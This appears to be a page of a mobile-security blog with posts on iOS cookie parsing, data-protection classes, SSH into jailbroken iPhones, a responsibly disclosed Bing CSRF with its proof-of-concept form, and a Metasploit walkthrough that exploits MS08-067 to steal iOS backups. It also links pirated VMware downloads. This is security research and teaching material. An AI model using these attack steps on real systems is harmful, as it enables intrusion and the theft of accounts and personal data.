RSS
 

Installing Mac OS X Mountain Lion in VMWare

22 Nov

Apple is not releasing the updates for Mac OS Lion Developer edition, so DP4 vm became older now and the latest version of Xcode (4.5)  is not working on it. To install the Mountain Lion on Vmware follow the steps provided below.

Mountain Lion VM:
1) Download VMware workstation 8 – Torrent Link
2) Enable hardware virtualization in the computer BIOS – If you don’t know how to do this, Read this link
3) Download Mac OS X Mountain Lion Vmware Image - Torrent Link
4) Vmware does not support the virtualization of OS X. To unlock the Vmware, extract the Mountain Lion Vmware image and go to ‘VMware Unlocker – Mac OS X Guest\VMware 8.x Series\VMware Workstation Unlocker – Windows’ folder. Right click on the ‘Install.bat’ and run it as administrator. It patches the Vmware and allows the installation of Mac OS X.
5) In the extracted vmware image, click on the .vmx file and it will load the Mountain Lion VM.

Vmware Tools:
1. Edit virtual machine settings, go to ‘Cd/Dvd’ and use ‘VMware Unlocker – Mac OS X Guest\VMware 8.x Series\Tools\darwin.iso’ as iso image.

mountain lion vm settings

2. Power On the virtual machine and click on Finder. Click on the iSO image listed on the right side and install the vmware tools. Vmware tools installation displays ‘The Installation Failed’ message and that is expected.

mountain lion vmware tools

3. Restart the VM and now it supports the Full screen mode.

XCode
1. Open Mac AppStore and login with iTunes account.
2. Search for Xcode and install it. It installs the Xcode 4.5 & iOS 6 simulator.

mountain lion xcode

Note: I tried updating the VM to Mountain Lion 10.8.2 but not succeeded.

 
 

Safari/iOS – Cookies.binarycookies reader

27 Oct

Safari browser and iOS applications store the persistent cookies in Cookies.binarycookies file. This is different from other desktop browsers. For example Internet Explorer stores the persistent cookies in text files under Temporary internet files folder. Similarly Firefox and Chrome browsers store the cookies in Sqlite database files. It is very easy to read the cookies stored in the text files and Sqlite database files. But there is no tool available to read the cookies from Cookies.binarycookies binary file. So I wrote a python script (BinaryCookieReader.py), when executed takes a Cookies.binarycookies file as input and dumps all the cookies in that file.

Usage of BinaryCookieReader
1. Download and install Python.
2. Add python installation folder to system PATH.
3. Download BinaryCookieReader.py
4. Open command prompt and run the below command. It dumps all the cookies from Cookies.binarycookies file.

Python BinaryCookieReader.py [Cookie.binarycookies-file-path]

Cookies.binarycookies reader

On the iPhone, Safari browser and third party iOS applications store the cookies in Cookies.binarycookies files located at the path shown below. Cookies created only with the future expiration date (persistent cookies) are stored in the binary Cookies.binarycookies file.

Cookies.binarycookies location

Most of the iOS applications create session cookies with future expiration dates as they don’t want to prompt the user for login every time. Usually those cookies will never get expire unless the user logout from the application. Also, during the iTunes backup, the Cookies.binarycookies file is copied to the backup folder. So if some one gain access to your iPhone  backup folder (Metasploit: Apple iOS backup extraction module), they can also get access to your email accounts and social network websites by reading the cookies from Cookies.binarycookies file.

Cookies.binarycookies Format:

Cookies.binarycookies file is composed of several pages and each page can have one or more cookies. The complete file format is explained below:

File Format:
1. The file starts with a 4 byte magic string: cook. It is used to identify the file type.
2. Next four bytes is an integer specifying the number of pages in the file.
3. Following that, a 4 byte integer for each page, represents the page size.
4. Next to that, the file contains the actual page content. Each page is of length corresponding to the page size. Page format is explained below.
5. The file ends with an 8 byte value and it might be file checksum.

cookies.binarycookies-file format

Page Format:
1. Every page starts with a 4 byte page header: 0×00000100.
2. Next four bytes is an integer specifying the number of cookies in the page.
3. Following that, a 4 byte integer for each cookie, represents the cookie offset. Offset specifies the start of the cookie in bytes from the start of the page.
4. Next to that, the page contains the actual cookie contents. Each cookie is of variable length. Cookie format is explained below.
5. Page ends with a 4 byte value and it is always 0×00000000.

cookies.binarycookies- page format

Cookie Format:
1. First 4 bytes in the cookie is the size of the cookie.
2. The next 4 bytes are unknown (may be related to cookies flags).
3. The next four bytes are the cookie flags. This is an integer value (1=Secure, 4=HttpOnly, 5= Secure+HttpOnly).
4. The next 4 bytes are unknown.
5. The next 4 bytes is an integer specifying the start of the url field in bytes from the start of the cookie record.
6. The next 4 bytes is an integer specifying the start of the name field in bytes from the start of the cookie record.
7. The next 4 bytes is an integer specifying the start of the path field in bytes from the start of the cookie record.
8. The next 4 bytes is an integer specifying the start of the value field in bytes from the start of the cookie record.
9. The next 8 bytes represents the end of the cookie and it is always 0×0000000000000000.
10. The next 8 bytes are the cookie expiration date. Date is in Mac epoch format (Mac absolute time). Mac epoch format starts from Jan 2001.
11. The next 8 bytes are the cookie creation date.
12. Next to that, the cookie contains the actual cookie domain, name, path & value. The order is not specific and they can appear in any order.

Cookies.binarycookies cookie format

*LE – Little Endian
*BE – Big Endian

References:
Tengu-Labs: Miyake%20-%20Safari%20Cookie.binarycookie%20Format%200_2[Draft].pdf
StackOverflow: safari-5-1-cookie-format-specs
Toolbox: understanding-the-safari-cookiesbinarycookies-file-format-49980

 
 

Extracting data protection class from files on iOS

18 Oct

On iOS, every file is encrypted with an unique encryption key as illustrated in the image. The content of a file is encrypted with a per-file key, which is wrapped with a class key (data protection class key) and stored in a file’s metadata, which is in turn encrypted with the file system key (EMF key). The file system key is generated from the hardware UID. UID is unique per device and it is embedded in hardware and inaccessible to code running on CPU.

iOS Files encryption

Imagine a file which is encrypted only with the file system key, upon physical access to the device custom ramdisk techniques (ex: msft_guy automated custom ramdisk) can be used to steal the file from passcode protected devices. To overcome this problem Data protection was introduced. Data protection protects the data at rest on iOS devices using encryption keys that are tied to the device passcode and UID. So if the file is protected with a data protection class and the user sets a passcode for the device, an attacker cannot access the file using custom ram disk technique until he knows the passcode. In simple, data protection provides another layer of security to files by encrypting them with a passcode generated key.

File protection is enabled by setting an accessibility constant to NSFileProtectionKey file attribute. Later the files are encrypted with  a protection class key respective to the accessibility constant marked for that file.

Ex: If a file is marked with NSProtectionComplete accessibility constant then the file is encrypted with Class 1 protection class key and it is available only when the user unlocks the device. If a file is created without specifying any accessibility constant then the file is marked as NSProtectionNone and it is accessible even the device is locked . List of accessibility constants available for files  are shown in the below table.

data protection classes for files in iOS

I wrote a program (FileDP), when executed takes a file as input and displays the accessibility constant of that file. The accessibility constant determines the type of class key. This would help during iOS application security assessments, to identify whether the sensitive files are protected with data protection or not.

Extracting data protection accessibility constant from files:
1. Download FileDP.
2. Copy FileDP to the iPhone over SSH using cyberduck or winscp.
3. Open  the terminal or putty and connect to the iPhone over SSH.
4. On ssh terminal, use the below command to provide executable permissions to FileDP.

chmod 777 FileDP

5. Use  the below command to list the Data protection accessibility constant of a file or for all the files in the directory.

./FileDP -[F/D] [FilePath/DirecotryPath]

data protection of all files in a directory

After running FileDP against an iOS application directory, I have noticed that the app preferences plist is not protected by data protection and it is marked as NSProtectionNone. The preferences plist is used by many applications to store configuration details and sensitive details like username’s, session cookies and authentication tokens. The preferences plist is usually generated by XCode and the user has no control  on the file attributes.

Ex: Facebook preferences plist – com.Facebook.Facebook.plist contains user authentication tokens and cookies. The below image shows that it is marked as NSFileProtectionNone.

data protection of a file on iPhone

 
 

SSH into iPhone over USB without Wi-Fi

11 Oct

SSH into a Jailbroken iPhone allows to browse files & folders on the device easily. When the iPhone and the computer are connected to the same WiFi network, it is easy to do SSH using any SSH client. SSH into the iPhone is also possible over USB cable and this comes handy in cases when the iPhone is not connected to the network. Steps below explains the procedure to SSH into the iPhone over USB cable.

Steps to SSH into iPhone through USB Cable (windows):

1. Jailbreak the iPhone and install OpenSSH from Cydia.
2. Download Python 2.6 and install it to c:\python26 folder.
3. Download usbmuxd file and extract it to C drive using winrar.
4. Connect the iPhone to windows machine over USB cable.
5. Open command prompt and type the below commands.

C:\> cd usbmuxd-1.0.8
C:\usbmuxd-1.0.8>cd python-client
C:\usbmuxd-1.0.8\python-client>\Python26\python.exe tcprelay.py -t 22:2222

SSH into iPhone without Wi-Fi

6. Download putty and open it.
7. On putty, enter Host Name as 127.0.0.1 and Port as 2222. Select connection type as SSH and click Open.

SSH into iPhone with putty

8. Now you are connected to iPhone over SSH. Type the username as root and the password as alpine to log into the iPhone.

SSH into iPhone putty

Note: Usbmuxd is a python module. So it works in Mac OS and other platforms as well. But the only limitation is, we can open only one SSH connection at a time. 

 
 

Microsoft Bing webmaster tools CSRF Vulnerability

17 Sep

I have noticed a CSRF vulnerability in the Bing webmaster tools website when I was working on SEO stuff for my site. I have reported the vulnerability to Microsoft and they fixed it now. CSRF attack on the webmaster tools website allows an attacker to change the logged in user’s profile without his knowledge. Complete details about the vulnerability are provided below.

Bing webmaster tools are used by website administrators to improve the site performance (SEO) in the Bing search engine. User profile page in the webmaster tools website is vulnerable to Cross site request forgery attack. Editing and saving the user’s profile in the webmaster tools website sends the below POST request to the server. You can notice that the POST request does not contain any CSRF tokens in the body.

POST /webmaster/Home/AddSiteAndSaveProfile HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-IN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ssl.bing.com
Content-Length: 298
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SRCHUID=V=2&GUID=2462AEB887D84132AB0618A62918004E; SRCHD=SM=1&MS=2412868&D=2412867&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20120802; MUID=304F0F31C56C634E0FF80C81C4626317; sample=75; ANON=A=31F3C21150BD85D5D0D7A653FFFFFFFF&E=cf4&W=1; NAP=V=1.9&E=c9a&C=cXG_15GH6sC_sMrxIO7LQdDowldUlTqmQaeoYvbJnsysU1edgzUh7w&W=1; _HOP=I=1&TS=1346886727; _SS=SID=D678E4708A614DF29AE30B8C415F32BA
firstName=satish&lastName=bs&email=satishb3@hotmail.com&jobrole=&company=securitylearn.net&companysize=&industry=17&contactphone=&city=&state=&zip=&country=in&isAgency=false&communicationsOptIn=true&communicationsOptIn=false&emailFrequency=7&alert=2&alert=4&alert=3&alert=5&alerts=

This would allow an attacker to change the logged in user’s profile without his knowledge by tricking him to visit a URL which loads the below html file.

<form id=f1 action="https://ssl.bing.com/webmaster/Home/AddSiteAndSaveProfile" method="POST"/>
<input type="hidden" name="firstName" value="satish" />
<input type="hidden" name="lastName" value="bs" />
<input type="hidden" name="email" value="satishb3@hotmail.com" />
<input type="hidden" name="jobrole" value="" />
<input type="hidden" name="company" value="securitylearn.net" />
<input type="hidden" name="companysize" value="" />
<input type="hidden" name="industry" value="17" />
<input type="hidden" name="contactphone" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="in" />
<input type="hidden" name="isAgency" value="false" />
<input type="hidden" name="communicationsOptIn" value="true" />
<input type="hidden" name="communicationsOptIn" value="false" />
<input type="hidden" name="emailFrequency" value="7" />
<input type="hidden" name="alert" value="2" />
<input type="hidden" name="alert" value="4" />
<input type="hidden" name="alert" value="3" />
<input type="hidden" name="alert" value="5" />
<input type="hidden" name="alerts" value="" />

Steps to verify:

  1. Open IE and log into Bing webmaster tools - http://www.bing.com/toolbox/webmaster
  2. Click on profile link (top right side) and look at the existing data.
  3. Create an html file with the above content & open it with IE. Later the html file prompts to open or save an attachment, click on cancel button.
  4. Now in the webmaster tools site, click on profile link and notice that the user data is replaced with the content in the html file.

 

CSRF tokens are not implemented across the whole website and making it to vulnerable for CSRF attacks.

[TimeLine]
August 02, 2012, I have reported the vulnerability to Microsoft.
August 03, 2012 they have opened MSRC (Microsoft Security Response Center) case.
August 12, 2012, I have noticed that the vulnerability is being fixed and emailed them for the update.
August 14, 2012 they replied back with this message- “The product team is still actively investigating the issue to ensure a full understanding and comprehensive remediation.”
September 16, 2012, they fixed the vulnerability.

Microsoft adding my name in their September 2012 security researchers list.

[Updated on - October 02, 2012]  
Microsoft added my name to September 2012 security researcher acknowledgements list-
http://technet.microsoft.com/en-us/security/cc308589

 
 

Metasploit post exploitation scripts to steal iOS 5 backups

09 Sep

Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups.

Running the existing apple_ios_backup post exploitation module in the Metasploit (v4.4.0) against an iOS 5 backup ends up with the below exception.

meterpreter> run post/multi/gather/apple_ios_backup
[*] Checking for backups in C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup
[*] Found C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3
[*] Checking for backups in C:\Documents and Settings\SATISH-E6338BC0\Application Data\Apple Computer\MobileSync\Backup
[*] Pulling data from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdb from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdx from C:\Documents and Settings\Administrator\Application Data\Apple Computer\MobileSync\Backup\b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.
[-] Call stack:
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channels/pools/file.rb:35:in `open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:325:in `_open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:276:in `initialize'

Below details outline the usage of updated Metasploit – Apple iOS Backup File Extraction module.  I have used Metasploit 4.4 from  Backtrack 5R1.

Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability”. So in order to use the iOS backup module, first we have to compromise the system using some other vector.

Usage Steps:
1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory.
2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory.
3. Open the Metasploit using msfconsole.
4. Use meterpreter as a payload and exploit a vulnerability in the target system.

In my case, the victim machine is running with the Windows XP OS (192.168.209.128) which is vulnerable to ms08_067_netapi vulnerability. Following the below steps exploits the vulnerability and opens a meterpreter shell.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.209.128
RHOST => 192.168.209.128
msf  exploit(ms08_067_netapi) > exploit

5. Once the meterpreter session is established,  iOS backup on the victim machine can be dumped using the following command- > run post/multi/gather/apple_ios_backup

The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup in the target system, it will displays ‘ No users found with an iTunes backup directory’ message. If it finds the backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.

iPhone backup path in windows & Mac OS x

Though Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing. Because all the files in the encrypted backup are encrypted with the user supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone.

The post module can steal the iOS backups from Windows and Mac OS X machines. I have tested it for Windows. It should definitely work for OS X as well.

iOS backup is a treasure for pentesters. Happy hacking :)

Video:

 

[Update -October 11, 2012]: The module also works for iOS 6 backups. 

 
 
Page 5 of 13« First...34567...10...Last »